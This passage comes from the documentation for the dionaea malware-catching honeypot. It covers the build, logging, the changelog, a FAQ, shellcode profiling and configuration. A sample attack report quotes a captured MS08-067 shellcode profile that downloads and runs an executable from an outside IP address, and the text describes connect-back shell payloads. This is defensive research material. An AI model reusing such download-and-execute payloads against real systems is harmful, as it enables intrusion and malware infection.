1647 bugs on GitHub.
1648
1649 Development
1650 Vagrant
1651 Vagrant can be used to setup a development environment for dionaea
1652 within minutes.
1653
1654 Install
1655 First install Vagrant and VirtualBox.
1656
1657 If everything has been setup correctly clone the git repository and use
1658 vagrant to bootstrap and start the environment.
1659
1660 $ git clone https://github.com/DinoTools/dionaea.git
1661 $ cd dionaea/vagrant
1662 $ vagrant up
1663
1664 All files will be installed in the /opt/dionaea directory.
1665
1666 Run
1667 Access the development environment, edit the config files and start
1668 dionaea with the following command.
1669
1670 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1671
1672 Rebuild and test
1673 To rebuild and install dionaea run the following commands.
1674
1675 $ cd /vagrant
1676 $ make
1677 $ sudo make install
1678
1679 See Run for more information on how to start dionaea.
1680
1681 Ubuntu 14.04
1682 Instead of using Vagrant you can use an Ubuntu 14.04 system to setup
1683 your development environment. In this section we will use the scripts
1684 used to setup the Vagrant environment to bootstrap a fresh Ubuntu
1685 system. If you like you can follow the ‘From Source’ installation
1686 guide to setup everything by hand.
1687
1688 Install
1689 First install Ubuntu.
1690
1691 If everything has been setup correctly clone the git repository and run
1692 the bootstrap script.
1693
1694 $ git clone https://github.com/DinoTools/dionaea.git
1695 $ cd dionaea/vagrant
1696 $ ./bootstrap.sh
1697
1698 All files will be installed in the /opt/dionaea directory.
1699
1700 Rebuild and test
1701 Rebuild, install and start dionaea from the root of the git repository.
1702
1703 $ make
1704 $ sudo make install
1705 $ sudo /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1706
1707 This can also be done in one line.
1708
1709 $ make && sudo make install && sudo dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg -l all,-debug -L '*'
1710
1711 Find memory leaks
1712 To enable AddressSanitizer you have to add the following parameters to
1713 the configure script and rebuild dionaea.
1714
1715 --disable-shared CFLAGS="-fsanitize=address -ggdb" CXXFLAGS="-fsanitize=address -ggdb"
1716
1717 When running dionaea it will print information about overflow errors.
1718 If you would like to stop execution you have to export an additional
1719 environment variable.
1720
1721 export ASAN_OPTIONS='abort_on_error=1'
1722
1723 To get a stacktrace you can use gdb and add an additional breakpoint:
1724 break __asan_report_error
1725
1726 It is also possible to use the asan_symbolize.py Python 2 script to extract
1727 additional information.
1728
1729 /opt/dionaea/bin/dionaea -c /opt/dionaea/etc/dionaea/dionaea.cfg 2>&1 | python asan_symbolize.py
1730
1731 Logging
1732 Logging should be used to report errors and for debugging purposes. It
1733 must not be used to report attacks. Incidents should be used for this
1734 purpose. For more information have a look at the ihandler section.
1735
1736 Comparison glib2 and Python
1737
1738 ┌─────────┬──────────┐
1739 │glib2 │ Python │
1740 ├─────────┼──────────┤
1741 │debug │ debug │
1742 ├─────────┼──────────┤
1743 │info │ info │
1744 ├─────────┼──────────┤
1745 │warning │ warning │
1746 ├─────────┼──────────┤
1747 │critical │ error │
1748 ├─────────┼──────────┤
1749 │error │ critical │
1750 └─────────┴──────────┘
1751
1752 WARNING:
1753 In glib2 a critical message means critical warning. But in Python a
1754 critical message is handled as critical error.
1755
1756 WARNING:
1757 An error message in glib2 or a critical message in a Python module
1758 will terminate the program immediately.
1759
1760 Incident
1761 Some of the incidents reported by the dionaea core are listed below.
1762
1763 dionaea.connection.tcp.accept:
1764 A new TCP connection has been accepted by dionaea.
1765
1766 dionaea.connection.tls.accept:
1767 A new SSL/TLS connection has been accepted by dionaea.
1768
1769 dionaea.connection.tcp.connect:
1770 Reported after dionaea has connected to an external service via TCP.
1771
1772 dionaea.connection.tls.connect:
1773 Reported after dionaea has connected to an external service via
1774 SSL/TLS.
1775
1776 dionaea.connection.udp.connect:
1777 Reported after dionaea has connected to an external service via UDP.
1778
1779 dionaea.connection.free:
1780 A connection has been closed and freed.
1781
1782 dionaea.connection.tcp.listen:
1783 Fired after a TCP service has been bound and is listening for
1784 incoming connections.
1785
1786 dionaea.connection.tls.listen:
1787 Fired after an SSL/TLS service has been bound and is listening for
1788 incoming connections.
1789
1790 dionaea.connection.tcp.pending:
1791
1792 dionaea.connection.tcp.reject:
1793 An incoming connection has been rejected by the server.
1794
1795 dionaea.connection.link.early:
1796
1797 dionaea.connection.link:
1798 Reported to give the log management the chance to link two
1799 connections.
1800
1802 0.8.0 - (master)
1803 0.7.0 - (2018-05-01)
1804 build
1805
1806 · Add initial cmake support
1807
1808 ci
1809
1810 · Add Debian 9
1811
1812 dionaea
1813
1814 · Fix build error with OpenSSL 1.1.0
1815
1816 · Improve OpenSSL 1.1.0 support
1817
1818 · Cleanup connection code
1819
1820 · Enable bistream for SSL/TLS connections (Thanks Aws0mus)
1821
1822 · Fixing chroot bugs (Thanks Michal Ambroz)
1823
1824 doc
1825
1826 · Add additional information
1827
1828 · Doxygen config file for dionaea c core
1829
1830 · Ubuntu 16.04 install instructions
1831
1832 package
1833
1834 · Remove old and deprecated debian package config
1835
1836 python
1837
1838 · Fix typo in config key
1839
1840 · Fix hardcoded python path
1841
1842 · Fix compilation on CentOS7 (Thanks Michal Ambroz)
1843
1844 python/http
1845
1846 · Initial support to handle SOAP requests
1847
1848 python/log_incident
1849
1850 · Improve hash generator
1851
1852 · Fix bug if parent is unknown
1853
1854 · Remove IDs from list if processed
1855
1856 python/mongo
1857
1858 · Initial support to simulate a MongoDB server
1859
1860 python/pyev
1861
1862 · Update from 0.8 to 0.9 to support Python >= 3.6
1863
1864 python/smb
1865
1866 · Add support for WannaCry and SambaCry (Big thanks to gento)
1867
1868 · Add additional config options to change identity
1869
1870 python/util
1871
1872 · Find Download commands for Linux shell
1873
1874 0.6.0 - (2016-11-14)
1875 dionaea
1876
1877 · Fix build for musl lib
1878
1879 doc
1880
1881 · Fix install instructions
1882
1883 · Extend README.md
1884
1885 python/blackhole
1886
1887 · New service/Initial version
1888
1889 python/emu_scripts
1890
1891 · New handler to analyse downloaded scripts
1892
1893 · Detect VBScript and PowerShell
1894
1895 · Limit number of subdownloads
1896
1897 python/http
1898
1899 · Clean up
1900
1901 · Use state vars instead of strings
1902
1903 · Add template support (Jinja 2 template engine, nginx template)
1904
1905 python/mysql
1906
1907 · Dump files from SELECT queries
1908
1909 · Extract URLs from functions
1910
1911 · Variable handler
1912
1913 · Support for selecting variables
1914
1915 python/p0f
1916
1917 · Fix decode error
1918
1919 python/pptp
1920
1921 · Fix error if config is empty
1922
1923 0.5.1 - 2016-09-05
1924 dionaea
1925
1926 · Don’t report ‘connection.free’ incident too early to prevent
1927 segmentation faults
1928
1929 0.5.0 - 2016-08-06
1930 dionaea
1931
1932 · Handle byte objects in incidents
1933
1934 · Bump required Python version from 3.2 to 3.4
1935
1936 python/http
1937
1938 · Detect Shellshock attacks
1939
1940 python/log_incident
1941
1942 · Initial support to export raw incident information
1943
1944 python/log_sqlite
1945
1946 · Log credentials from the ftp service
1947
1948 python/memcache
1949
1950 · Initial support for the memcached protocol
1951
1952 python/pptp
1953
1954 · Clean up
1955
1956 · Handle CallClearRequests packets
1957
1958 · Values for hostname, vendor name and firmware revision are now
1959 customizable
1960
1961 python/util
1962
1963 · New function to detect shellshock attacks and report detected URLs
1964
1965 0.4.2 - 2016-07-02
1966 doc
1967
1968 · Add information about log levels for developers
1969
1970 python/*
1971
1972 · Replace all critical log messages with error messages
1973
1974 · Catch exceptions in handle_io_in() and handle_io_out() to improve
1975 stability
1976
1977 · Catch exceptions in incident handlers
1978
1979 python/sip
1980
1981 · Fix error while reading config values
1982
1983 python/upnp
1984
1985 · Fix errors in log messages
1986
1987 more
1988
1989 · Add templates to create issues and merge requests on github
1990
1991 0.4.1 - 2016-06-14
1992 core
1993
1994 · Initialize stdout logger earlier
1995
1996 · Log error,critical and warning by default
1997
1998 python/*
1999
2000 · In glib2 critical is a critical warning
2001
2002 · Add support for exceptions
2003
2004 · Check file path and show warnings
2005
2006 python/log_json
2007
2008 · Add support for flat object lists to work with ELK stack
2009
2010 0.4.0 - 2016-05-31
2011 core
2012
2013 · Replace lcfg with Key-value file parser from glib
2014
2015 ci
2016
2017 · Add build tests for Ubuntu 14.04, Ubuntu 16.04 and Debian 8
2018
2019 doc
2020
2021 · Add initial documentation for missing modules
2022
2023 · Update documentation to reflect config changes
2024
2025 · Add processor documentation
2026
2027 python/*
2028
2029 · Replace lcfg with yaml configs
2030
2031 · Remove deprecated incident handlers (logxmpp, mwserv, SurfIDS)
2032
2033 · Rename incident handlers from logsql to log_sqlite
2034
2035 · Rename incident handlers from uniqdownload to submit_http_post
2036
2037 python/mysql
2038
2039 · Enable processor pipeline
2040
2041 0.3.0 - 2016-03-30
2042 core
2043
2044 · Code clean up (Thanks to Katarina)
2045
2046 · Vagrant based dev environment
2047
2048 · Customize ssl/tls parameters for autogenerated certificates
2049
2050 doc
2051
2052 · Initial version of sphinx based documentation
2053
2054 python/ftp
2055
2056 · Support to customize response messages
2057
2058 · Small fixes
2059
2060 python/hpfeeds
2061
2062 · Initial ihandler support (Thanks to rep)
2063
2064 python/http
2065
2066 · Customize HTTP response headers
2067
2068 · Return HTTP/1.1 instead of HTTP/1.0
2069
2070 python/log_json
2071
2072 · Initial ihandler support
2073
2074 python/mqtt
2075
2076 · Initial protocol support (Thanks to gento)
2077
2078 python/pptp
2079
2080 · Initial protocol support (Thanks to gento)
2081
2082 python/upnp
2083
2084 · Initial protocol support (Thanks to gento)
2085
2086 0.2.1 - 2014-07-16
2087 core
2088
2089 · Support for cython and cython3
2090
2091 · Fixes to build with glib 2.40
2092
2093 · Remove build warnings
2094
2095 · Support libnl >= 3.2.21
2096
2097 python/http
2098
2099 · Fix unlink() calls
2100
2101 python/virustotal
2102
2103 · virustotal API v2.0
2104
2105 0.2.0 - 2013-11-02
2106 Last commit by original authors.
2107
2108 0.1.0
2109 · Initial release.
2110
2112 WARNING:
2113 The documentation is work in progress.
2114
2115 Build/Install
2116 I get gcc: command not found?
2117 Install gcc.
2118
2119 How to uninstall it?
2120 rm -rf /opt/dionaea
2121
2122 I get binding.pyx:…: undeclared name not builtin: bytes during the
2123 python modules build.
2124 Install a recent cython version.
2125
2126 I get Python.h not found during compiling cython
2127 Install the appropriate headers for your python interpreter.
2128
2129 I do not use ubuntu/debian and the instructions are useless for me
2130 therefore.
2131 I use debian/ubuntu, and therefore I can only provide instructions
2132 for debian/ubuntu, but you are free to send me a diff for your
2133 operating system.
2134
2135 I use Redhat/Centos 5 and the installation is frustrating and a mess as
2136 nothing works.
2137 That’s right, but I did not choose your operating system. Here is a
2138 list of outdated or missing packages for your chosen distribution:
2139 all. Yes, you’ll even have to install glib (you’ll have 2.10 where
2140 2.20 is required) from source. Getting python3 compiled with a
2141 recent sqlite3 version installed to /opt/dionaea requires editing
2142 the setup.py file (patch <http://p.carnivore.it/KDIFWt>). I
2143 experienced this wonderful operating system myself … You really have to
2144 love your distro to stick with it, even if it ships software
2145 versions your grandma saw released in her youth. Centos is the best
2146 distro … to change distros. No matter what you choose, it can’t get
2147 worse.
2148
2149 Unable to build.
2150
2151 ==> default: cp build/*/dionaea/*.so /opt/dionaea/lib/dionaea/python.so
2152 ==> default: cp:
2153 ==> default: target ‘/opt/dionaea/lib/dionaea/python.so’ is not a directory
2154
2155 ==> default: libtool: Version mismatch error. This is libtool 2.4.6 Debian-2.4.6-2, but the
2156 ==> default: libtool: definition of this LT_INIT comes from libtool 2.4.2.
2157 ==> default: libtool: You should recreate aclocal.m4 with macros from libtool 2.4.6 Debian-2.4.6-2
2158 ==> default: libtool: and run autoconf again.
2159
2160 Try to clean your build environment.
2161
WARNING:
This will remove all ignored and untracked files from the
directory. Use --dry-run first to see what would be removed.

git clean -xdf
2167
2168 Run
2169 I get OperationalError at unable to open database file when using
2170 logsqlite and it does not work at all
2171 Read the logsql instructions <#logsql>
2172
2173 I get a Segmentation Fault
2174 Read the segfault instructions <#segfault>
2175
2176 I logrotate, and after logrotate dionaea does not log anymore.
2177 Read the logrotate instructions <#logging>
2178
p0f does not work.
Make sure you have p0f 2.0.8 and that dionaea does not listen on ::;
p0f can’t deal with IPv6.
2182
2183 I’m facing a bug, it fails, and I can’t figure out why.
2184 Explain the problem, if I’m interested in the nature of the problem,
2185 as it does not sound like pebcak, I may ask for a shell/screen and
2186 have a look myself, and if it is worth it, you’ll even get a FAQ
2187 entry for some specialties of your OS.
2188
Unable to bind to port after dropping privileges
Dropping privileges and still binding to ports lower than 1024 is only
supported on Linux systems. If some of the optional build dependencies
are missing, dionaea might not be able to bind to these ports either.
After enabling all log levels it should display log messages like
those in the example below.
2195
2196 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2197 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2198 [10052017 15:58:17] connection connection.c:230: Could not bind 1.2.3.4:21 (Permission denied)
2199
To fix this issue you have to install the kernel headers for your
kernel and rebuild dionaea. If everything works as it should, you
might get log messages like those in the example below. Note the new
pchild lines: they mean dionaea is using a child process with extended
privileges to bind the port on behalf of the unprivileged main process.
2205
2206 [10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
2207 [10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
2208 [10052017 15::58:17] pchild pchild.c:199: sending msg to child to bind port ...
2209 [10052017 15::58:17] pchild pchild.c:218: child could bind the socket!
2210 [10052017 15::58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
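The two log excerpts can be checked mechanically after a restart. The following is an added example, not part of dionaea: a small Python parser that reads connection/pchild log lines in the layout shown above (the sample lines are constructed in that format) and reports, per address:port, whether the socket was bound directly, bound through the privileged child, or failed and why.

```python
"""Check dionaea's startup log for listeners that failed to bind.

Added example, not part of dionaea. It reads the connection/pchild log
lines in the layout shown above and reports, per address:port, whether the
socket was bound directly, bound through the privileged child (pchild), or
failed and why.
"""
import re

# "[date time] domain file:line: message" layout of dionaea's log lines.
LINE_RE = re.compile(r"^\[[^\]]*\]\s+(?P<domain>\w+)\s+\S+:\d+:\s+(?P<msg>.*)$")
SOCKET_RE = re.compile(r"bind_local socket \d+ (?P<ep>\S+)$")
FAIL_RE = re.compile(r"Could not bind (?P<ep>\S+) \((?P<reason>[^)]*)\)")
NODE_RE = re.compile(r"node '(?P<ep>[^']+)'")


def bind_status(lines):
    """Map each endpoint to 'bound', 'bound-via-pchild', 'failed: <reason>'
    or 'pending' (socket created, outcome never logged)."""
    status = {}
    current = None      # endpoint of the most recently created socket
    via_pchild = False  # the child bound it on behalf of the main process
    for raw in lines:
        m = LINE_RE.match(raw.strip())
        if not m:
            continue
        domain, msg = m.group("domain"), m.group("msg")
        if domain == "connection":
            s = SOCKET_RE.search(msg)
            if s:
                current, via_pchild = s.group("ep"), False
                status.setdefault(current, "pending")
                continue
            f = FAIL_RE.search(msg)
            if f:
                status[f.group("ep")] = "failed: " + f.group("reason")
                continue
            n = NODE_RE.search(msg)
            if n:
                status[n.group("ep")] = "bound-via-pchild" if via_pchild else "bound"
        elif domain == "pchild" and "child could bind" in msg and current:
            via_pchild = True
    return status


def failed_endpoints(lines):
    """Endpoints dionaea could not bind; an empty list means all listeners are up."""
    return sorted(ep for ep, st in bind_status(lines).items()
                  if st.startswith("failed"))


# Constructed sample in the format of the log excerpts above: port 21 is
# bound through pchild, port 80 fails, port 8080 binds directly.
SAMPLE_LOG = """\
[10052017 15:58:17] connection connection.c:200: bind_local con 0x55f21b1ec720
[10052017 15:58:17] connection connection.c:216: bind_local socket 10 1.2.3.4:21
[10052017 15:58:17] pchild pchild.c:199: sending msg to child to bind port ...
[10052017 15:58:17] pchild pchild.c:218: child could bind the socket!
[10052017 15:58:17] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:21'
[10052017 15:58:18] connection connection.c:200: bind_local con 0x55f21b1ec800
[10052017 15:58:18] connection connection.c:216: bind_local socket 11 1.2.3.4:80
[10052017 15:58:18] connection connection.c:230: Could not bind 1.2.3.4:80 (Permission denied)
[10052017 15:58:18] connection connection.c:200: bind_local con 0x55f21b1ec900
[10052017 15:58:18] connection connection.c:216: bind_local socket 12 1.2.3.4:8080
[10052017 15:58:18] connection connection.c:316: ip '1.2.3.4' node '1.2.3.4:8080'
"""

if __name__ == "__main__":
    for ep, st in sorted(bind_status(SAMPLE_LOG.splitlines()).items()):
        print(ep, st)
```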
2211
2216 Rotate bistream files
Dionaea does not have, and may never have, a function or option to
rotate the bistream files. But you can do this by using a cron job and
a simple shell script.
2220
2221 Feel free to use and modify the script below.
2222
#!/bin/bash
# Rotate dionaea bistream files; intended to be run from cron.
set -eu
BISTREAMS=/var/lib/dionaea/bistreams

# Compress bistream files older than 2 days, skipping already compressed ones
find "$BISTREAMS" -type f -mtime +2 ! -name '*.gz' -exec gzip {} +

# Clear bistream logs from dionaea every week
find "$BISTREAMS" -type f -mtime +7 -delete
# Remove per-connection directories left empty, but keep the bistreams
# directory itself
find "$BISTREAMS" -mindepth 1 -type d -empty -delete
2231
2233 Cui honorem, honorem
2234 Google:
2235 Google has supported 3 students to work on dionaea during GSoc 2009,
2236 GSoc 2010 and GSoc 2011.
2237
2238 SURFnet:
SURFnet has supported the project in the past (2010?-2014?). Working
with SURFnet is a real pleasure.
2241
2242 Support
If you are getting frustrated because things do not work for you and
you have already read the FAQ, join the mailing list and share your
experience, or join the chat.
2246
2247 GitHub
2248 Use the issue tracker to report any problem.
2249
2250 Website: Issue tracker
2251
2252 IRC
2253 From time to time some of the developers join the #nepenthes channel
2254 on freenode. irc://irc.freenode.org/nepenthes
2255
2256 Mailing List:
2257 Only a few messages every year. Seems to be dead, no message since
2258 2015.
2259
2260 Website: Mailinglist nepenthes-devel
2261
2262 Links
2263 · GSoC 2009 Project #10 http://honeynet.org/gsoc/project10
2264
2265 · The Honeynet Project
2266
2267 Old documentation:
2268
Attackers do not seek your service; attackers want to exploit you.
They will chat with the service for some packets, and afterwards send
a payload. dionaea has to detect and evaluate the payload to be able
to gain a copy of the malware. In order to do so, dionaea uses libemu.

Given certain circumstances, libemu can detect shellcode, measure the
shellcode, and if required even execute the shellcode. Shellcode
detection is done by making use of GetPC heuristics; others wrote
papers about it, we decided to write libemu to do so. This detection
is rather time consuming, and is therefore done in threads.

The part of dionaea which takes care of the network io can create a
copy of all input and output of a connection. This copy is passed to
the detection facility, which is a tree of detection facilities; at
this moment there is only a single leaf, the emu plugin. The emu
plugin uses threads and libemu to detect and profile/measure
shellcode.

Shellcode measurement/profiling is done by running the shellcode in
the libemu vm and recording API calls and arguments. For most
shellcode, profiling is sufficient: the recorded API calls and
arguments reveal enough information to get an idea of the attacker’s
intention and act upon it. For multi-stage shellcode, where the first
exploitation stage of the shellcode would retrieve a second shellcode
from the attacker, profiling is not sufficient, as we lack the
information ‘what to do’ from the second stage of the shellcode; in
this case we need to make use of shellcode execution. Shellcode
execution is basically the same as shellcode profiling, the only
difference being that the API calls are not recorded and we allow the
shellcode to take certain actions, for example creating a network
connection.
2299
2300 Payloads
Once we have the payload and the profile, dionaea has to guess the
intention and act upon it.

Shells - bind/connectback
This payload offers a shell (cmd.exe prompt) to the attacker, either
by binding a port and waiting for the attacker to connect to us again,
or by connecting back to the attacker. In both cases, dionaea offers a
cmd.exe emulation to the attacker, parses the input, and acts upon
the input; usually the instructions download a file via ftp or tftp.

URLDownloadToFile
These shellcodes use the URLDownloadToFile API call to retrieve a
file via http, and execute the retrieved file afterwards.

Exec
Making use of WinExec, these shellcodes execute a single command
which has to be parsed and processed like the shell commands of the
bind/connectback shell.

Multi Stage Payloads
We never know what the second stage is, therefore libemu is used to
execute the shellcode in the libemu vm.
2323
Once dionaea has extracted from the shellcode the location of the file
the attacker wants it to download, dionaea will try to download the
file. The protocols to download files via tftp and ftp are implemented
in python (ftp.py and tftp.py) as part of dionaea; downloading files
via http is done in the curl module, which makes use of libcurl’s
awesome http capabilities. Of course libcurl can run downloads for ftp
too, but the ftp services embedded in malware are designed to work
with the windows ftp.exe client, and fail for other clients.
2333
Once dionaea has got a copy of the worm attacking her, we may want to
store the file locally for further analysis, or submit the file to some
3rd party for further analysis.

dionaea can http/POST the file to several services like CWSandbox,
Norman Sandbox or VirusTotal.
2341
If you want to change the software, it is really important to
understand how it works, therefore please take the time to read how it
works. dionaea.conf is the main configuration file; the file consists
of sections for:
2347
2348 · logging
2349
2350 · processors
2351
2352 · downloads
2353
2354 · bistreams
2355
2356 · submit
2357
2358 · listen
2359
2360 · modules
2361
2362 logging
2363 The logging section controls … logging, you can specify log domains and
2364 loglevel for different logfiles. As dionaea is pretty … verbose, it is
2365 useful to rotate the logfiles using logrotate.
2366
2367 # logrotate requires dionaea to be started with a pidfile
2368 # in this case -p /opt/dionaea/var/run/dionaea.pid
2369 # adjust the path to your needs
2370 /opt/dionaea/var/log/dionaea*.log {
2371 notifempty
2372 missingok
2373 rotate 28
2374 daily
2375 delaycompress
2376 compress
2377 create 660 root root
2378 dateext
2379 postrotate
2380 kill -HUP `cat /opt/dionaea/var/run/dionaea.pid`
2381 endscript
2382 }
2383
Save this as /etc/logrotate.d/dionaea.
2385
2386 modules
downloads specifies where to store downloaded malware. bistreams
specifies where to store bi-directional streams; these are pretty
useful when debugging, as they allow replaying an attack on ip-level
without messing with pcap&tcpreplay, which never worked for me. submit
specifies where to send files to via http or ftp; you can define a new
section within submit if you want to add your own service. listen sets
the addresses dionaea will listen on. The default is all addresses it
can find, this mode is called getifaddrs, but you can set it to manual
and specify a single address if you want to limit it. modules is the
most powerful section, as it specifies the modules to load, and the
options for each module.
2398
2399 logsql
2400 This section controls the logging to the sqlite database. logsql does
2401 not work when chrooting - python makes the path absolute and fails for
2402 requests after chroot().
2403
logsql requires the directory where the logsql.sqlite file resides to
be writable by the user, as well as the logsql.sqlite file itself.
So, if you drop user privs, make sure the user you drop to is allowed
to read/write the file and the directory.
2408
2409 chown MYUSER:MYGROUP /var/lib/dionaea -R
2410
To query the logsql database, I recommend looking at the
readlogsqltree.py <#readlogsqltree> script, and for visualisation at
the gnuplotsql <#gnuplotsql> script.
2414
2415 The blog on logsql:
2416
2417 · 2009-11-06 dionaea sql logging
2418
2419 · 2009-12-08 post it yourself
2420
2421 · 2009-12-12 sqlite performance
2422
2423 · 2009-12-14 virustotal fun
2424
2425 · 2009-12-15 paris mission pack avs
2426
2427 · 2010-06-06 data visualisation
2428
2429 logxmpp
This section controls the logging to xmpp services. If you want to use
logxmpp, make sure to enable logxmpp in the ihandler section. Using
logxmpp allows you to share your newly collected files with other
sensors anonymously.
2434
2435 The blog on logxmpp:
2436
2437 · 2010-02-10 xmpp backend
2438
2439 · 2010-05-12 xmpp take #2
2440
2441 · 2010-05-15 xmpp take #3
2442
pg_backend <#pg_backend> can be used as a backend for xmpp logging
sensors.
2445
2446 p0f
Not enabled by default, but recommended: the p0f service. Enable it by
uncommenting p0f in the ihandlers section of the python modules
section, and start p0f as suggested in the config. It costs nothing,
and gives some pretty cool, even if outdated, information about the
attacker’s operating system, and you can look it up from the sqlite
database, even for the rejected connections. If you face problems,
here are some hints.
2454
2455 ihandlers
ihandlers section is used to specify which ihandlers get started by
ihandlers.py. You do not want to miss p0f and logsql.
2458
2459 services
2460 services controls which services will get started by services.py
2461
Dionaea ships with some utils. As these utils are written in python and
rely on the python3 interpreter dionaea requires to operate, this
software can be found in modules/python/utils:
2466
2467 readlogsqltree <#readlogsqltree> -
2468 modules/python/readlogsqltree.py
2469
readlogsqltree is a python3 script which queries the logsql sqlite
database for attacks, and prints out all related information for every
attack. In the example below you get the vulnerability exploited, the
time, the attacker, information about the shellcode, the file offered
for download, and even the virustotal report for the file:
2475
2476 2010-10-07 20:37:27
2477 connection 483256 smbd tcp accept 10.0.1.11:445 <- 93.177.176.190:47650 (483256 None)
2478 dcerpc bind: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2479 dcerpc bind: uuid '7d705026-884d-af82-7b3d-961deaeb179a' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2480 dcerpc bind: uuid '7f4fdfe9-2be7-4d6b-a5d4-aa3c831503a1' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2481 dcerpc bind: uuid '8b52c8fd-cc85-3a74-8b15-29e030cdac16' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2482 dcerpc bind: uuid '9acbde5b-25e1-7283-1f10-a3a292e73676' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2483 dcerpc bind: uuid '9f7e2197-9e40-bec9-d7eb-a4b0f137fe95' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2484 dcerpc bind: uuid 'a71e0ebe-6154-e021-9104-5ae423e682d0' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2485 dcerpc bind: uuid 'b3332384-081f-0e95-2c4a-302cc3080783' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2486 dcerpc bind: uuid 'c0cdf474-2d09-f37f-beb8-73350c065268' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2487 dcerpc bind: uuid 'd89a50ad-b919-f35c-1c99-4153ad1e6075' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2488 dcerpc bind: uuid 'ea256ce5-8ae1-c21b-4a17-568829eec306' (None) transfersyntax 8a885d04-1ceb-11c9-9fe8-08002b104860
2489 dcerpc request: uuid '4b324fc8-1670-01d3-1278-5a47bf6ee188' (SRVSVC) opnum 31 (NetPathCanonicalize (MS08-67))
2490 profile: [{'return': '0x7df20000', 'args': ['urlmon'], 'call': 'LoadLibraryA'}, {'return': '0', 'args': ['', 'http://208.53.183.158/m.exe', '60.exe', '0', '0'], 'call': 'URLDownloadToFile'}, {'return': '32', 'args': ['60.exe', '895'], 'call': 'WinExec'}, {'return': '0', 'args': ['-1'], 'call': 'Sleep'}]
2491 offer: http://208.53.183.158/m.exe
2492 download: 3eab379ddac7d80d3e38399fd273ddd4 http://208.53.183.158/m.exe
2493 virustotal 2010-10-07 04:59:07 5/38 (13%) http://www.virustotal.com/file-scan/report.html?id=265e39edcba9d9004451601544e625f2d3d04f837d0aaf1f8464cb2c819c1939-1286420347
2494 names 'High Risk Fraudulent Security Program' 'Suspicious file' 'Trojan.DownLoader1.27100' 'Worm.Win32.Rimecud' 'Worm:Win32/Rimecud.B'
2495
To create such a report for your own honeypot’s activity of the last
24 hours, run:
2498
2499 ./readlogsqltree.py -t $(date '+%s')-24*3600 /var/lib/dionaea/logsql.sqlite
2500
2501
2502 gnuplotsql <#gnuplotsql> - modules/python/gnuplotsql.py
2503
gnuplotsql is a very slow python3 script which runs some queries on the
logsql <#logsql> sqlite database, creates graphs of the data with
gnuplot, stores them on disk and creates an index of the data. The
images are per protocol and look like this: Overview for dionaea smbd.
Here <gnuplotsql> is how the whole thing looks. To create such images
of your own data, run:
2510
2511 ./gnuplotsql.py -d /var/lib/dionaea/logsql.sqlite -p smbd -p epmapper -p mssqld -p httpd -p ftpd
2512
2513 The blog got something on gnuplotsql as well:
2514
2515 · 2010-12-05 sudden death
2516
2517 · 2010-10-01 Infosanity’s Blog: gnuplotsql.py
2518
2519 · 2010-09-19 gnuplotsql
2520
2521 pg_backend <#pg_backend> - modules/python/xmpp/pg_backend.py
2522
2523 pg_backend is the backend for logxmpp <#logxmpp>, currently it is a
2524 python2.x script which uses pyxmpp to access the xmpp service. It
2525 parses the messages received and can store the events in a postgres
2526 database and the received files on disk. pg_backend requires an xmpp
2527 account:
2528
Without db:
2530 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -f /tmp/
2531
With db:
2533 create database
2534
2535 psql ...
2536
2537 start backend
2538
2539 ./pg_backend.py -U USER@sensors.carnivore.it -P XMPPPASS -M dionaea.sensors.carnivore.it -C anon-files -C anon-events -s DBHOST -u DBUSER -d xmpp -p DBPASS -f /tmp/
2540
2542 In case you experience a segfault, you will see something like this:
2543
2544 This is the end. This software just had a segmentation fault. The bug
2545 you encountered may even be exploitable. If you want to assist in fix‐
2546 ing the bug, please send the backtrace below to nepenthesdev@gmail.com.
2547 You can create better backtraces with gdb, for more information visit
2548 http://dionaea.carnivore.it/#segfault Once you read this message, your
2549 tty may be broken, simply type reset, so it will come to life again:
2550
2551 /opt/dionaea/bin/dionaea(sigsegv_backtrace_cb+0x20)[0x805c11e]
2552 [0x70d420]
2553 /opt/dionaea/lib/libemu/libemu.so.2(emu_env_w32_eip_check+0x94)[0x186974]
2554 /opt/dionaea/lib/dionaea/emu.so(run+0x39)[0x89cced]
2555 /opt/dionaea/lib/dionaea/emu.so(profile+0xbb)[0x89db88]
2556 /opt/dionaea/lib/dionaea/emu.so(proc_emu_on_io_in+0x1e1)[0x89bfc5]
2557 /opt/dionaea/bin/dionaea(recurse_io_process+0x31)[0x805df4a]
2558 /opt/dionaea/bin/dionaea(processors_io_in_thread+0x85)[0x805e08d]
2559 /opt/dionaea/bin/dionaea(threadpool_wrapper+0x2e)[0x805c99a]
2560 /opt/dionaea/lib/libglib-2.0.so.0[0xaa9498]
2561 /opt/dionaea/lib/libglib-2.0.so.0[0xaa7a2f]
2562 /lib/libpthread.so.0[0xd8973b]
2563 /lib/libc.so.6(clone+0x5e)[0x2b3cfe]
2564
While the backtrace itself gives an idea what might be wrong, it does
not fix the problem. To fix the problem, the logfiles usually help, as
dionaea is very verbose by default. Below are some hints on how to get
started with debugging; click here <#support> for assistance.
2569
2570 debugging
2571
2573 Valgrind does a great job, here is how I use it:
2574
2575 valgrind -v --leak-check=full --leak-resolution=high --show-reachable=yes \
